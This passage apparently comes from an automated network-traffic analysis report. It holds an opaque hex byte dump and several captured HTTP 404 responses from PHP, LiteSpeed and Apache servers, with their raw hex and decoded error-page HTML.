e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db 9f 76 5f e3 a7 7e 8c ec 27 1a 3c c1 2f 5f b0 1f fd c9 47 cf 3e 27 fb 48 d1 b4 1a be a5 85 d8 07 b3 d1 96 7d eb a3 87 9f f4 18 da ee 1d b0 0f a6 c9 12 7c e4 ad 9f e1 13 e7 5f 19 78 e2 72 da 4f 57 77 f2 90 78 98 1c c7 0c de ae 48 2f 58 33 87 fe 3e 6b 46 69 b8 2f db c9 af 18 cc b3 19 87 66 1a 06 fa af 47 e3 cd 34 02 82 b7 a6 83 37 49 51 dd 8b a4 b7 6c d6 23 f0 59 c7 52 62 f4 85 dc 02 b2 fe 2d 7d 43 a3 f5 ec 1b 3f ea d6 b3 8f fc 18 bc d5 81 51 b6 a7 83 6f fc e8 d9 47 7e 99 0d cd f0 2d 3d 15 d1 76 29 3c 0e ec 8f 15 d0 a5 72 90 27 eb db cb 91 d7 a2 e1 0f ed e4 7b a8 d3 6b 23 80 7a 43 04 ea 13 d7 4b f4 89 9f 06 7c 3a 9b 48 1b e2 69 40 3f e9 d6 c4 6b 23 8f 95 69 13 6f f6 7d ef b2 fc 3c 9c f4 4e 15 05 7b de e0 51 cf 3b 70 fd f6 fb 78 ce e8 30 eb 2b 4a 21 8e bb 55 f5 ba 6f 8f 0f 41 5e 31 55 08 a6 0a b5 c0 82 83 18 13 0a 6d 79 e2 d0 9b 5a 1f 04 75 bd ea 2b 07 8c ed 02 87 8a a9 5c 31 95 57 8b 2c 0f 4d 5c 37 73 de 9d ed a9 2b 48 3c 42 e2 c0 94 3c 30 a5 f2 85 17 37 83 e7 a7 92 f5 a7 d5 4b dd 4c e3 49 18 fb 09 bd a5 b5 e2 5c a4 b7 b4 26 3e cc a6 b3 9e 6b 98 4d 97 78 9b cf de de 28 f6 13 9f fa 5c 17 07 dd b4 b6 4a 66 e1 2a d1 78 89 8f 7f e2 f5 57 6f da 0a e9 b1 f6 8a f4 65 6e 72 e6 e4 6d 47 8d 8c 7f e5 60 d9 52 88 c4 cf 58 6c 15 f4 82 92 ab 62 26 97 f8 19 6b 7b 47 1d 3c 59 fa b4 f2 33 b4 bd 48 70 1b f5 5a 8f d7 55 e1 dc b2 1d 86 49 2e a1 9f 9c 25 dd 99 71 c0 8a ee aa e0 f3 ba 15 f5 12 3d 81 1d 8b 96 fa 66 23 f4 d2 d8 90 36 74 16 a5 67 4a c1 f6 2e a2 da fa 48 87 c3 cf 98 9d 10 16 5d 1b b2 78 d6 9b 46 72 57 86 68 34 57 4e b1 88 f5 a9 4e e5 90 f0 ad c3 f9 00 e8 22 4e eb de c2 2a 03 84 23 8a ab a5 20 fd 0f 65 1c e0 9a 5d 6e 9d 2a a2 ed cd 88 67 fc 73 16 ac cd 42 e5 ec 41 0a f1 78 4e fc 13 5a 0e d6 34 b2 4b 34 33 12 9f b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29cache-control: no-cache, privatecontent-type: text/html; charset=UTF-8content-length: 6603date: Sun, 24 Nov 2024 07:22:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 32 65 38 66 30 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 43 6f 75 72 69 65 72 20 4e 65 77 2c 6d 6f 6e 6f 73 70 61 63 65 7d 73 76 67 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 76 69 64 65 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 62 67 2d 77 68 69 74 65 7b 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:23:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:23:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:24:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:24:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:24:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:24:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 